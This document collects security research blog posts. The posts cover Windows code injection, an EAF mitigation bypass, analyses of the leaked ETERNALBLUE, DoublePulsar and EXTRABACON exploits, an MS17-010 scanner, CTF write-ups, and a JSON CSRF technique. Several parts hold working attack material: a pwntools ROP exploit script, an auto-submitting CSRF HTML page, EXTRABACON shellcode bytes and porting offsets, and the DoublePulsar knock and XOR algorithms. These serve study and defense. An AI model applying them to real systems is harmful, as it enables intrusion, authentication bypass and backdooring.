    Another issue is we could corrupt the original threads stack. I subtracted 0x2000 from RSP to find a new spot to spam up.

    I've seen similar (but non-successful) techniques for code injection. I found a rare amount of similar information [1] [2]. These techniques were not interested in performing proper cleanup of the stolen thread, which is not practical in many circumstances. This is essentially the same process that RtlRemoteCall() follows. As such, there may be issues for threads in a wait state returning an incorrect status? None of these sources uses reflective restoration.

    As user mode API is highly explored territory, this may not be an original technique. If so, take the example for what it is ([relatively] clean code with academic explanation) and chalk it up to multiple discovery. Leave flames, spam, and questions in the comments!

    If you want to learn more about techniques like this, come to the Advanced Windows Post-Exploitation / Malware Forward Engineering DEF CON 25 workshop.

    Proposed Windows 10 EAF/EMET "Bypass" for Reflective DLL Injection

    Windows 10 Redstone 3 (Fall Creator's Update) is adding Exploit Guard, bringing EMET's Export Address Table Access Filtering (EAF) mitigation, among others, to the system. We are still living in a golden era of Windows exploitation and post-exploitation, compared to the way things will be once the world moves onto Windows 10. This is a mitigation that will need to be bypassed sooner or later.

    EAF sets hardware breakpoints that check for legitimate access when the function exports of KERNEL32.DLL and NTDLL.DLL are read. It does this by checking if the offending caller code is part of a legitimately loaded module (which reflective DLL injection is not). EAF+ adds another breakpoint for KERNELBASE.DLL. One bypass was searching a DLL such as USER32.DLL for its imports, however Windows 10 will also be adding the brand new Import Address Table Access Filtering (IAF).

    So how can we avoid the EAF exploit mitigation? Simple, reflective DLLs, just like normal DLLs, take an LPVOID lpParam. Currently, the loader code does nothing with this besides forwarding it to DllMain. We can allocate and pass a pointer to this struct.


    #pragma pack(1)
    typedef struct _REFLECTIVE_LOADER_INFO
    {

    LPVOID lpRealParam;
    LPVOID lpDosHeader;
    FARPROC fLoadLibraryA;
    FARPROC fGetProcAddress;
    FARPROC fVirtualAlloc;
    FARPROC fNtFlushInstructionCache;
    FARPROC fVirtualLock;

    } REFLECTIVE_LOADER_INFO, *PREFLECTIVE_LOADER_INFO;

    Instead of performing two allocations, we could also shove this information in a code cave at start of the ReflectiveLoader(), or in the DOS headers. I don't think DOS headers are viable for Metasploit, which inserts shellcode there (that does some MSF setup and jumps to ReflectiveLoader(), so you can start execution at offset 0), but perhaps in the stub between the DOS->e_lfanew field and the NT headers.

    Reflective DLLs search backwards in memory for their base MZ DOS header address, requiring a second function with the _ReturnAddress() intrinsic. We know this information and can avoid the entire process (note: method not possible if we shove in DOS headers).

    Likewise, the addresses for the APIs we need are also known information before the reflective loader is called. While it's true that there is full ASLR for most loaded DLL modules these days, KERNEL32.DLL and NTDLL.DLL are only randomized upon system boot. Unless we do something weird, the addresses we see in the injecting process will be the same as in the injected process.

    In order to get code execution to the point of being able to inject code in another process, you need to be inside of a valid context or previously have necessary function pointers anyways. Since EAF does not alert from a valid context, obtaining pointers in the first place should not be an issue. From there, chaining this method with migration is not a problem.

    This kind of removes some of the novelty from reflective DLL injection. It's known that instead of self-loading, it's possible to perform the loader code from the injector (this method is seen in powerkatz.dll [PowerShell Empire's Mimikatz] and process hollowing). However, recently there was a circumstance where I was forced to use reflective injection due to the constraints I was working within. More on that at a later time, but reflective DLL injection, even with this extra step, still has plenty of uses and is highly coupled to the tools we're currently using... This is a simple fix when the issue comes up.

    Talk/Workshop at DEF CON 25

    Just got the word that @aleph___naught and I will be presenting a talk and workshop at DEF CON 25.

    Our talk is a post-exploitation RAT using the Windows Script Host. Executing completely from memory with tons of ways to fork to shellcode. Will contain some original research (with the help of @JennaMagius and @The_Naterz) and amazing prior work by @tiraniddo, @subTee, and @enigma0x3. Queue @mattifestation interjecting with something about app whitelisting!

    The workshop is not just the tactics, but the code and reverse engineering behind all the stuff in penetration testing rootkits such as Meterpreter and PowerShell Empire. It will include a deep look into Windows internals and some new concepts and ideas not yet present in the normal set of tools.

    All slides and code will be posted at the end of DEF CON.

    ETERNALBLUE: Exploit Analysis and Port to Microsoft Windows 10

    The whitepaper for the research done on ETERNALBLUE by @JennaMagius and I has been completed.

    Be sure to check the bibliography for other great writeups of the pool grooming and overflow process. This paper breaks some new ground by explaining the execution chain after the memory corrupting overwrite is complete.

    PDF Download

    Errata

    r5hjrtgher pointed out the vulnerable code section did not appear accurate. Upon further investigation, we discovered this was correct. The confusion was because unlike the version of Windows Server 2008 we originally reversed, on Windows 10 the Srv!SrvOs2FeaListSizeToNt function was inlined inside Srv!SrvOs2FeaListToNt. We saw a similar code path and hastily concluded it was the vulnerable one. Narrowing the exact location was not necessary to port the exploit.

    Here is the correct vulnerable code path for Windows 10 version 1511:

    How the vulnerability was patched with MS17-010:

    The 16-bit registers were replaced with 32-bit versions, to prevent the mathematical miscalculation leading to buffer overflow.

    Minor note: there was also extra assembly and mitigations added in the code paths leading to this.

    To all the foreign intelligence agencies trying to spear phish I've already deleted all my data! :tinfoil:

    DoublePulsar Initial SMB Backdoor Ring 0 Shellcode Analysis

    One week ago today, the Shadow Brokers (an unknown hacking entity) leaked the Equation Group's (NSA) FuzzBunch software, an exploitation framework similar to Metasploit. In the framework were several unauthenticated, remote exploits for Windows (such as the exploits codenamed EternalBlue, EternalRomance, and EternalSynergy). Many of the vulnerabilities that are exploited were fixed in MS17-010, perhaps the most critical Windows patch in almost a decade.

    Side note: You can use my MS17-010 Metasploit auxiliary module to scan your networks for systems missing this patch (uncredentialed and non-intrusive). If a missing patch is found, it will also check for an existing DoublePulsar infection.

    Introduction

    For those unfamiliar, DoublePulsar is the primary payload used in SMB and RDP exploits in FuzzBunch. Analysis was performed using the EternalBlue SMBv1/SMBv2 exploit against Windows Server 2008 R2 SP1 x64.

    The shellcode, in tl;dr fashion, essentially performs the following:

    • Step 0: Shellcode sorcery to determine if x86 or x64, and branches as such.
    • Step 1: Locates the IDT from the KPCR, and traverses backwards from the first interrupt handler to find ntoskrnl.exe base address (DOS MZ header).
    • Step 2: Reads ntoskrnl.exe's exports directory, and uses hashes (similar to usermode shellcode) to find ExAllocPool/ExFreePool/ZwQuerySystemInformation functions.
    • Step 3: Invokes ZwQuerySystemInformation() with the enum value SystemQueryModuleInformation, which loads a list of all drivers. It uses this to locate Srv.sys, an SMB driver.
    • Step 4: Switches the SrvTransactionNotImplemented() function pointer located at SrvTransaction2DispatchTable[14] to its own hook function.
    • Step 5: With secondary DoublePulsar payloads (such as inject DLL), the hook function sees if you "knock" correctly and allocates an executable buffer to run your raw shellcode. All other requests are forwarded directly to the original SrvTransactionNotImplemented() function. "Burning" DoublePulsar doesn't completely erase the hook function from memory, just makes it dormant.

    After exploitation, you can see the missing symbol in the SrvTransaction2DispatchTable. There are supposed to be 2 handlers here with the SrvTransactionNotImplemented symbol. This is the DoublePulsar backdoor (array index 14):

    Honestly, you don't usually wake up in the morning and feel like spending time dissecting ~3600 some odd bytes of Ring-0 shellcode, but I felt productive today. Also I was really curious about this payload and didn't see many details about it outside of Countercept's analysis of the DLL injection code. But I was interested in how the initial SMB backdoor is installed, which is what this post is about.

    Zach Harding, Dylan Davis, and I kind of rushed through it in a few hours in our red team lab at RiskSense. There is some interesting setup in the EternalBlue exploit with the IA32_LSTAR syscall MSR (0xc000082) and a region of the Srv.sys containing FEFEs, but I will instead focus on just the raw DoublePulsar methodology... Much like the EXTRABACON shellcode, this one is crafty and does not simply spawn a shell.

    Detailed Shellcode Analysis

    Inside the Shadow Brokers dump you can find DoublePulsar.exe and EternalBlue.exe. When you use DoublePulsar in FuzzBunch, there is an option to spit its shellcode out to a file. We found out this is a red herring, and that the EternalBlue.exe contained its own payload.

    Step 0: Determine CPU Architecture

    The main payload is quite large because it contains shellcode for both x86 and x64. The first few bytes use opcode trickery to branch to the correct architecture (see my previous article on assembly architecture detection).

    Here is how x86 sees the first few bytes.

    You'll notice that inc eax means the je (jump equal/zero) instruction is not taken. What follows is a call and a pop, which is to get the current instruction pointer.

    And here is how x64 sees it:

    The inc eax byte is instead the REX preamble for a NOP. So the zero flag is still set from the xor eax, eax operation. Since x64 has RIP-relative addressing it doesn't need to get the RIP register.

    The x86 payload is essentially the same thing as the x64 so this post only focuses on x64.

    Since the NOP was a true NOP on x64, I overwrote the 40 90 with cc cc (int 3) using a hex editor. Interrupt 3 is how debuggers set software breakpoints.

    Now when the system is exploited, our attached kernel debugger will automatically break when the shellcode starts executing.

    Step 1: Find ntoskrnl.exe Base Address

    Once the shellcode figures out it is x64 it begins to search for the base of ntoskrnl.exe. This is done with the following stub:

    Fairly straightforward code. In user mode, the GS segment for x64 contains the Thread Information Block (TIB), which holds the Process Environment Block (PEB), a struct which contains all kinds of information about the current running process. In kernel mode, this segment instead contains the Kernel Process Control Region (KPCR), a struct which at offset zero actually contains the current process PEB.

    This code grabs offset 0x38 of the KPCR, which is the "IdtBase" and contains a pointer struct of KIDTENTRY64. Those familiar with the x86 family will know this is the Interrupt Descriptor Table.

    At offset 4 into the KIDENTRY64 struct you can get a function pointer to the interrupt handler, which is code defined inside of ntoskrnl.exe. From there it searches backwards in memory in 0x1000 increments (page size) for the .exe DOS MZ header (cmp bx, 0x5a4d).

    Step 2: Locate Necessary Function Pointers

    Once you know where the MZ header of a PE file is, you can peek into defined offsets for the export directory and get the relative virtual address (RVA) of any function you want. Userland shellcode does this all the time, usually to find necessary functions it needs out of ntdll.dll and kernel32.dll. Just like most userland shellcode, this ring 0 shellcode also uses a hashing algorithm instead of hard-coded strings in order to find the necessary functions.

    The following functions are found:

    ExAllocatePool can be used to create regions of executable memory, and ExFreePool can clean it up when done. These are important so the shellcode can allocate space for its hooks and other functions. ZwQuerySystemInformation is important in the next step.

    Step 3: Locate Srv.sys SMB Driver

    A feature of ZwQuerySystemInformation is a constant named SystemQueryModuleInformation, with the value 0xb. This gives a list of all loaded drivers in the system.

    The shellcode then searched this list for two different hashes, and it landed on Srv.sys, which is one of the main drivers that SMB runs on.

    The process here is basically equivalent to getting PEB->Ldr in userland, which lets you iterate loaded DLLs. Instead, it was looking for the SMB driver.

    Step 4: Patch the SMB Trans2 Dispatch Table

    Now that the DoublePulsar shellcode has the main SMB driver, it iterates over the .sys PE sections until it gets to the .data section.

    Inside of the .data section is generally global read/write memory, and stored here is the SrvTransaction2DispatchTable, an array of function pointers that handle different SMB tasks.

    The shellcode allocates some memory and copies over the code for its function hook.

    Next the shellcode stores the function pointer for the dispatch named SrvTransactionNotImplemented() (so that it can call it from within the hook code). It then overwrites this member inside SrvTransaction2DispatchTable with the hook.

    That's it. The backdoor is complete. Now it just returns up its own call stack and does some small cleanup chores.

    Step 5: Send "Knock" and Raw Shellcode

    Now when DoublePulsar sends its specific "knock" requests (which are seen as invalid SMB calls), the dispatch table calls the hooked fake SrvTransactionNotImplemented() function. Odd behavior is observed: normally the SMB response MultiplexID must match the SMB request MultiplexID, but instead it is incremented by a delta, which serves as a status code.

    Operations are hidden in plain sight via steganography, which do not have proper dissectors in Wireshark.

    The status codes (via MultiplexID delta) are:

    • 0x10 = success
    • 0x20 = invalid parameters
    • 0x30 = allocation failure

    The opcode list is as follows:

    • 0x23 = ping
    • 0xc8 = exec
    • 0x77 = kill

    You can tell which opcode was called by using the following algorithm:

    t = SMB.Trans2.Timeout
    op = (t) + (t >> 8) + (t >> 16) + (t >> 24);

    Conversely, you can make the packet using this algorithm, where k is randomly generated:

    op = 0x23
    k = 0xdeadbeef
    t = 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00

    Sending a ping opcode in a Trans2 SESSION_SETUP request will yield a response that holds part of a XOR key that needs to be calculated for exec requests.

    The "XOR key" algorithm is:

    s = SMB.Signature1
    x = 2 * s ^ (((s & 0xff00 | (s > 16) | s & 0xff0000) >> 8))

    More shellcode can be sent with a Trans2 SESSION_SETUP request and exec opcode. The shellcode is sent in the "data payload" part of the packet 4096 bytes at a time, using the XOR key as a basic stream cipher. The backdoor will allocate an executable region of memory, decrypt and copy over the shellcode, and run it. The Inject DLL payload is simply some DLL loading shellcode prepended to the DLL you actually want to inject.

    We can see the hook is installed at SrvTransaction2DispatchTable+0x70 (112/8 = index 14):

    And of course the full disassembly listing.

    Conclusion

    There you have it, a highly sophisticated, multi-architecture SMB backdoor. The world probably did not need a remote Windows kernel payload this advanced being spammed across the Internet. It's an unique payload, because you can infect a system, lay low for a little bit, and come back later when you want to do something more intrusive. It also finds a nice place in the system to hide out and not alert built-in defenses like PatchGuard. It is unclear if newer versions of PatchGuard, such as those in Windows 10, already detect this hook. We can expect them to be added if not.

    Usually we only get to see kernel shellcode in local exploits, as it swaps process tokens in order to privilege escalate. However, Microsoft does many networking things in the kernel, such as Srv.sys and HTTP.sys. The techniques demonstrated are in many ways completely analagous to how usermode shellcode operates during remote exploits.

    If/when this gets ported over to Metasploit, I would probably not copy this verbatim, and rather skip the backdoor idea. It isn't the most secure thing to do, as it's not a big secret anymore and anyone else can come along and use your backdoor.

    Here's what can be done instead:

    1. Obtain ntoskrnl.exe address in the same fashion as DoublePulsar, and read export directory for necessary functions to perform the next operations.
    2. Spawn a hidden process (such as notepad.exe).
    3. Queue an APC with Meterpreter payload.
    4. Resume process, and exit the kernel cleanly.

    Every major malware family, from botnets to ransomware to banking spyware, will eventually add the exploits in the FuzzBunch toolkit to their arsenal. This payload is simply a mechanism to load more malware with full system privileges. It does not open new ports, or have any real encryption or other features to prevent others from taking advantage of the same hole, making the attribution game for digital forensic investigators even more difficult. This is a jewel compared to the scraps that were given to Stuxnet. It comes in a more dangerous era than the days of Conficker. Given the persistence of the missing MS08-067 patch, we could be in store for a decade of breaches emanating from MS17-010 exploits. It is the perfect storm for one of the most damaging malware infections in computing history.

    MS17-010 (SMB RCE) Metasploit Scanner Detection Module

    Update April 21, 2017 - There is an active pull request at Metasploit master which adds DoublePulsar infection detection to this module.

    During the first Shadow Brokers leak, my colleagues at RiskSense and I reverse engineered and improved the EXTRABACON exploit, which I wrote a feature about for PenTest Magazine. Last Friday, Shadow Brokers leaked FuzzBunch, a Metasploit-like attack framework that hosts a number of Windows exploits not previously seen.Β Microsoft's official responseΒ says these exploits were fixed up inΒ MS17-010, released in mid-March.

    Yet again I find myself tangled up in the latest Shadow Brokers leak. I actually wrote a scanner to detect MS17-010 about 2-3 weeks prior to the leak, judging by the date on my initial pull request to Metasploit master. William Vu, of Rapid7 (and whom coincidentally I met in person the day of the leak), added some improvements as well. It was pulled into the master branch on the day of the leak. This module can be used to scan a network range (RHOSTS) and detect if the patch is missing or not.

    Module InformationΒ Page
    https://rapid7.com/db/modules/auxiliary/scanner/smb/smb_ms17_010

    Module Source Code
    https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/smb/smb_ms17_010.rb

    My scanner module connects to the IPC$ tree and attempts a PeekNamedPipe transaction on FID 0. If the status returned is "STATUS_INSUFF_SERVER_RESOURCES", the machine does not have the MS17-010 patch. After the patch, Win10 returns "STATUS_ACCESS_DENIED" and other Windows versions "STATUS_INVALID_HANDLE". In case none of these are detected, the module says it was not able to detect the patch level (I haven't seen this in practice).

    IPC$ is the "InterProcess Communication" share, which generally does not require valid SMB credentials in default server configurations. Thus this module can usually be done as an unauthed scan, as it can log on as the user "\" and connect to IPC$.

    This is the most important patch for Windows in almost a decade, as it fixes several remote vulnerabilities for which there are now public exploits (EternalBlue, EternalRomance, and EternalSynergy).

    These are highly complex exploits, but the FuzzBunch framework essentially makes the process as easy as point and shoot. EternalRomance does a ridiculous amount of "grooming", aka remote heap feng shui. In the case of EternalBlue, it spawns numerous threads and simultaneously exploits SMBv1 and SMBv2, and seems to talk Cairo, an undocumented SMB LanMan alternative (only known because of the NT4 source code leaks). I haven't gotten around to looking at EternalSynergy yet.

    I am curious to learn more, but have too many side projects at the moment to spend my full efforts investigating further. And unlike EXTRABACON, I don't see any "obvious" improvements other than I would like to see an open source version.

    Overflow Exploit Pattern Generator - Online Tool

    Metasploit's pattern generator is a great tool, but Ruby's startup time is abysmally slow. Out of frustration, I made this in-browser online pattern generator written in JavaScript.

    Generate Overflow Pattern


    Find Overflow Offset

    For the unfamiliar, this tool will generate a non-repeating pattern. You drop it into your exploit proof of concept. You crash the program, and see what the value of your instruction pointer register is. You type that value in to find the offset of how big your buffer should be overflowed before you hijack execution.

    See also: Obfuscated String/Shellcode Generator - Online Tool

    Hack the Vote CTF "The Wall" Solution

    RPISEC ran a capture the flag called Hack the Vote 2016 that was themed after the election. In the competition was "The Wall" challenge by itszn.

    The Wall challenge clue:

    The Trump campaign is running a trial of The Wall plan. They want to prove that no illegal immigrants could get past it. If that goes as planned, us here at the DNC will have a hard time swinging some votes in the southern boarder states. We need you to hack system and get past the wall. I heard they have put extra protections into place, but we think you can still do it. If you do get into America, there should be a flag somewhere in the midwest that you can have. You will be US "citizen" after all.

    The challenge link was a tarball with a bunch of directories. Inside the /bin/ folder was an x64 ELF called "minetest", which is a Minecraft clone. I was pleased to see this was a video game challenge, having a fair amount of infamy for hacking online games in my past lives.

    When you run the game, you log onto a server and are greeted with Trump's wall. It's yuuuge, spanning infinitely across the horizontal plane.

    So the goal must be to get around this wall and into America. I tried a few naive approaches, as I just wanted to get something like a simple warp or run-through-wall type of cheat running, but alas there was an anti-cheat built into the game.

    No problem, it wouldn't be the first time I've had to defeat an anti-cheat system. I started reversing a function called Client::handleCommand_CheatChallange() (sic):

    I deduced this function was reading /proc/self/maps and running a SHA1 function on it. At first I was going to just overwrite this function to make it give the expected SHA1, but then I started backing up and found this function was only called when you first joined the server. So all that was needed to bypass the anti-cheat was to delay load however I planned to cheat.

    Poking around the game and binary some more, I noticed there was a "fly" mode, that my client didn't have the privilege from the server for:

    Well, my client still has the code for flying even if the server says I don't have the privilege. I found a function called Client::checkLocalPrivilege(). The function takes a C++ std::string of a privilege (such as fly) and returns a bool.

    Yea, this guy's doing way too much work for me. Time to patch it with the following assembly:

    inc eax   ; ff c0
    ret ; c3
    nop ; 90

    This will make the function always return true when my client checks if I have access to a certain privilege. After logging into the server, I attached to my client with GDB and patched my new assembly into the privilege check function:

    Now that I could fly, I noticed the wall also grew infinitely vertical. Fortunately, from way up high I was able to glitch through the wall.

    I made it!

    I wandered through the desert for 40 days and 40 night cycles.

    No really, I wandered a long time. I should also mention disabling the privilege checks gives access to a speed hack, but it was a little glitchy and the server kept warping me backwards.

    I was starting to get worried, when all of a sudden I saw beautiful Old Glory off in the distance.

    Hack the Vote CTF "IRS" Solution

    RPISEC ran a capture the flag called Hack the Vote 2016 that was themed after the election. In the competition was the "IRS" challenge by pigeon.

    IRS challenge clue:

    Good day fellow Americans. In the interest of making filing your tax returns as easy and painless as possible, we've created this nifty lil' program to better serve you! Simply enter your name and file away! And don't you worry, everyone's file is password protected ;)

    We get a pwnable x86 ELF Linux binary with non-executable stack. There's also details for a server to ncat to to exploit it.

    The program contains about 10 functions that are relatively straightforward about what they do just going off the strings. Exploring the program, there is a blatant address leak when there is an attempt to create more than 5 total users in the system.

    This %p is given to puts(). It dereferences to a pointer address that is the start of an array of structs which hold IRS tax return data. Here is the initialization code for Trump's struct:

    Note that Trump's password is "not_the_flag" here, but on the server it will be the flag.

    Preceding Trump's struct construction is a call to malloc() with 108 bytes, and throughout the program we only see 4 distinct fields. So the completed struct most likely is:


    struct IRS_Data
    {
    char name[50];
    char pass[50];
    int32_t income;
    int32_t deductibles;
    };

    In a function which I named edit_tax_return(), there is a call to gets(). This is a highly vulnerable C function that writes to a buffer from stdin with no constraints on length, and thus should probably never be used.

    The exploitation process can be pretty simple if you take advantage of other functions present in the binary.

    1. Create enough users to leak the user array pointer
    2. Overflow the gets() in edit_tax_return() with a ROP chain
    3. ROP #1 calls view_tax_return() with the leaked pointer and index 0 (a.k.a. Trump)
    4. ROP #2 cleanly returns back to the start of main()
    #!/usr/bin/env python2
    from pwn import *

    #r = remote("irs.pwn.republican", 4127)
    r = process('./irs.4ded.3360.elf')

    r.send("1\n"*21) # create a bunch of fake users
    r.recvuntil("0x") # get the leaked %p address

    database_addr = int(r.recvline().strip(), 16)
    log.success("Got leaked address %08x" % database_addr)

    r.send("3\n"+"1\n"*4) # edit a known user record

    overflow = "A"*25
    overflow += p32(0x0804892C) # print_tax_return(pDB, i)
    overflow += p32(0x08048a39) # main(void), safe return
    overflow += p32(database_addr) # pDB
    overflow += p32(0x00000000) # i

    r.send(overflow + "\n") # 08048911 call gets

    r.recvuntil("Password: ") # print_tax_return() Trump password

    flag = r.recvline().split(" ")[0]
    log.success(flag)

    CSRF Attack for JSON-encoded Endpoints

    Sometimes you see a possible Cross-Site Request Forgery (CSRF) attack against JSON endpoints, where data is a JSON blob instead of x-www-form-urlencoded data.

    Here is a PoC that will send a JSON CSRF.


    <html>
    Β  Β  <form action="http://127.0.0.1/json" method="post"
    Β  Β  Β  Β  enctype="text/plain" name="jsoncsrf">
    Β  Β  Β  Β  <input
    Β  Β  Β  Β  Β  Β  name='{"json":{"nested":"obj"},"list":["0","1"]}'
    Β  Β  Β  Β  Β  Β  type='hidden'>
    Β  Β  </form>
    Β  Β  <script>
    Β  Β  Β  Β  Β document.jsoncsrf.submit()
    Β  Β  </script>
    </html>

    You can use any JSON including nested objects, lists, etc.

    The previous example adds a trailing equal sign =, which will break some parsers. You can get around it with:


    <input name='{"json":"data","extra' value='":"stuff"}'
    type='hidden'>

    Which will give the following JSON:


    {"json":"data","extra=":"stuff"}

    Reverse Engineering Cisco ASA for EXTRABACON Offsets

    Update Sept. 24: auxiliary/admin/cisco/cisco_asa_extrabacon is now in the Metasploit master repo. There is support for the original ExtraBacon leak and ~20 other newer versions.

    Update Sept. 22: Check this GitHub repo for ExtraBacon 2.0, improved Python code, a Lina offset finder script, support for a few more 9.x versions, and a Metasploit module.

    BackgroundΒ 

    On August 13, 2016 a mysterious Twitter account (@shadowbrokerss) appeared, tweeting a PasteBin link to numerous news organizations. The link described the process for an auction to unlock an encrypted file that claimed to contain hacking tools belonging to the Equation Group. Dubbed last year by Kaspersky Lab, Equation Group are sophisticated malware authors believed to be part of the Office of Tailored Access Operations (TAO), a cyber-warfare intelligence-gathering unit of the National Security Agency (NSA). As a show of good faith, a second encrypted file and corresponding password were released, with tools containing numerous exploits and even zero-day vulnerabilities.

    One of the zero-day vulnerabilities released was a remote code execution in the Cisco Adaptive Security Appliance (ASA) device. The Equation Group's exploit for this was named EXTRABACON. Cisco ASAs are commonly used as the primary firewall for many organizations, so the EXTRABACON exploit release raised many eyebrows.

    At RiskSense we had spare ASAs lying around in our red team lab, and my colleague Zachary Harding was extremely interested in exploiting this vulnerability. I told him if he got the ASAs properly configured for remote debugging I would help in the exploitation process. Of course, the fact that there are virtually no exploit mitigations (i.e. ASLR, stack canaries, et al) on Cisco ASAs may have weighed in on my willingness to help. He configured two ASAs, one containing version 8.4(3) (which had EXTRABACON exploit code), and version 9.2(3) which we would target to write new code.

    This blog post will explain the methodology for the following submissions to exploit-db.com:

    There is detailed information about how to support other versions of Cisco ASA for the exploit. Only a few versions of 8.x were in the exploit code, however the vulnerability affected all versions of ASA, including all of 8.x and 9.x. This post also contains information about how we were able to decrease the Equation Group shellcode from 2 stages containing over 200+ bytes to 1 stage of 69 bytes.

    Understanding the ExploitΒ 

    Before we can begin porting the exploit to a new version, or improving the shellcode, we first need to know how the exploit works.

    This remote exploit is your standard stack buffer overflow, caused by sending a crafted SNMP packet to the ASA. From the internal network, it's pretty much a guarantee with the default configuration. We were also able to confirm the attack can originate from the external network in some setups.

    Hijacking ExecutionΒ 

    The first step in exploiting a 32-bit x86 buffer overflow is to control the EIP (instruction pointer) register. In x86, a function CALL pushes the current EIP location to the stack, and a RET pops that value and jumps to it. Since we overflow the stack, we can change the return address to any location we want.

    In the shellcode_asa843.py file, the first interesting thing to see is:


    my_ret_addr_len = 4
    my_ret_addr_byte = "\xc8\x26\xa0\x09"
    my_ret_addr_snmp = "200.38.160.9"

    This is an offset in 8.4(3) to 0x09a026c8. As this was a classic stack buffer overflow exploit, my gut told me this was where we would overwrite the RET address, and that there would be a JMP ESP (jump to stack pointer) here. Sometimes your gut is right:

    The vulnerable file is called "lina". And it's an ELF file; who needs IDA when you can use objdump?

    Stage 1: "Finder"Β 

    The Equation Group shellcode is actually 3 stages. After we JMP ESP, we find our EIP in the "finder" shellcode.


    finder_len = 9
    finder_byte = "\x8b\x7c\x24\x14\x8b\x07\xff\xe0\x90"
    finder_snmp = "139.124.36.20.139.7.255.224.144"

    This code finds some pointer on the stack and jumps to it. The pointer contains the second stage.

    We didn't do much investigating here as it was the same static offsets for every version. Our improved shellcode also uses this first stage.

    Stage 2: "Preamble"Β 

    Observing the main Python source code, we can see how the second stage is made:


    wrapper = sc.preamble_snmp
    if self.params.msg:
    wrapper += "." + sc.successmsg_snmp
    wrapper += "." + sc.launcher_snmp
    wrapper += "." + sc.postscript_snmp

    Ignoring successmsg_snmp (as the script --help text says DO NOT USE), the following shellcode is built:

    It seems like a lot is going on here, but it's pretty simple.

    1. A "safe" return address is XORed by 0xa5a5a5a5
      1. unnecessary, yet this type of XOR is everywhere. The shellcode can contain null bytes so we don't need a mask
    2. Registers smashed by the stack overflow are fixed, including the frame base pointer (EBP)
    3. The fixed registers are saved (PUSHA = push all)
    4. A pointer to the third stage "payload" (to be discussed soon) is found on the stack
      • This offset gave us trouble. Luckily our improved shellcode doesn't need it!
    5. Payload is called, and returns
    6. The saved registers are restored (POPA = pop all)
    7. The shellcode returns execution to the "safe" location, as if nothing happened

    I'm guessing the safe return address is where the buffer overflow would have returned if not exploited, but we haven't actually investigated the root cause of the vulnerability, just how the exploit works. This is probably the most elusive offset we will need to find, and IDA does not recognize this part of the code section as part of a function.

    If we follow the function that is called before our safe return, we can see why there are quite a few registers that need to be cleaned up.

    These registers also get smashed by our overflow. If we don't fix the register values, the program will crash. Luckily the cleanup shellcode can be pretty static, with only the EBP register changing a little bit based on how much stack space is used.

    Stage 3: "Payload"Β 

    The third stage is where the magic finally happens. Normally shellcode, as it is aptly named, spawns a shell. But the Equation Group has another trick up its sleeve. Instead, we patch two functions, which we called "pmcheck()" and "admauth()", to always return true. With these two functions patched, we can log onto the ASA admin account without knowing the correct password.

    Note: this is for payload "pass-disable". There's a second payload, "pass-enable", which re-patches the bytes. So after you log in as admin, you can run a second exploit to clean up your tracks.

    For this stage, there is payload_PMCHECK_DISABLE_byte and payload_AAAADMINAUTH_DISABLE_byte. These two shellcodes perform the same overall function, just for different offsets, with a lot of code reuse.

    Here is the Equation Group PMCHECK_DISABLE shellcode:

    There's some shellcode trickery going on, but here are the steps being taken:

    1. First, the syscall to mprotect() marks a page of memory as read/write/exec, so we can patch the code
    2. Next, we jump forward to right before the end of the shellcode
      • The last 3 lines of the shellcode contain the code to "always return true"
    3. The call instruction puts the current address (where patch code is) on the stack
    4. The patch code address is pop'd into esi and we jump backwards
    5. rep movs copies 4 bytes (ecx) from esi (source index) to edi (destination index), then we jump to the admauth() patch

    The following is functional equivalent C code:


    const void *PMCHECK_BOUNDS = 0x954c000;
    const void *PMCHECK_OFFSET = 0x954cfd0;

    const int32_t PATCH_BYTES = 0xc340c031;

    sys_mprotect(PMCHECK_BOUNDS, 0x1000, PROT_READ | PROT_WRITE | PROT_EXEC);
    *PMCHECK_OFFSET = PATCH_BYTES;

    In this case, PMCHECK_BYTES will be "always return true".


    xor eax, eax ; set eax to 0 -- 31 c0
    inc eax ; increment eax -- 40
    ret ; return -- c3

    Yes, my friends who are fluent in shellcode, the assembly is extremely verbose just to write 4 bytes to a memory location. Here is how we summarized everything from loc_00000025 to the end in the improved shellcode:

    mov dword [PMCHECK_OFFSET], PMCHECK_BYTES

    In the inverse operation, pass-enable, we will simply patch the bytes to their original values.

    Finding OffsetsΒ 

    So now that we've reverse engineered the shellcode, we know what offsets we need to patch to port the exploit to a new Cisco ASA version:

    1. The RET smash, which should be JMP ESP (ff e4) bytes
    2. The "safe" return address, to continue execution after our shellcode runs
    3. The address of pmcheck()
    4. The address of admauth()

    RET SmashΒ 

    We can set the RET smash address to anywhere JMP ESP (ff e4) opcodes appear in an executable section of the binary. There is no shortage of the actual instruction in 9.2(3).

    Any of these will do, so we just picked a random one.

    Safe Return AddressΒ 

    This is the location to safely return execution to after the shellcode runs. As mentioned, this part of the code isn't actually recognized as a function by IDA, and also the same trick we'll use for the Authentication Functions (searching the assembly with ROPgadget) doesn't work here.

    The offset in 8.4(3) is 0xad457e33 ^ 0xa5a5a5a5 = 0x8e0db96

    This contains a very unique signature of common bytes we can grep for in 9.2(3).

    Our safe return address offset is at 0x9277386.

    Authentication FunctionsΒ 

    Finding the offsets for pmcheck() and admauth() is pretty simple. The offsets in 8.4(3) are not XORed by 0xa5a5a5a5, but the page alignment for sys_mprotect() is.

    We'll dump the pmcheck() function from 8.4(3).

    We have the bytes of the function, so we can use the Python ROPGadget tool from Jonathan Salwan to search for those bytes in 9.2(3).

    It's a pretty straightforward process, which can be repeated for admauth() offsets. Note that during this process, we get the unpatch bytes needed for the pass-enable shellcode.

    Finding the page alignment boundaries for these offsets (for use in sys_mprotect()) is easy as well, just floor to the nearest 0x1000.

    Improving the ShellcodeΒ 

    We were able to combine the Equation Group stages "preamble" and "payload" into a single stage by rewriting the shellcode. Here is a list of ways we shortened the exploit code:

    1. Removed all XOR 0xa5a5a5a5 operations, as null bytes are allowed
    2. Reused code for the two sys_mprotect() calls
    3. Used a single mov operation instead of jmp/call/pop/rep movs to patch the code
    4. General shellcode size optimization tricks (performing the same tasks with ops that use less bytes)

    The lackadaisical approach to the shellcode, as well as the Python code, came as a bit of surprise as the Equation Group is probably the most elite APT on the planet. There's a lot of cleverness in the code though, and whoever originally wrote it obviously had to be competent. To me, it appears the shellcode is kind of an off-the-shelf solution to solving generic problems, instead of being custom tailored for the exploit.

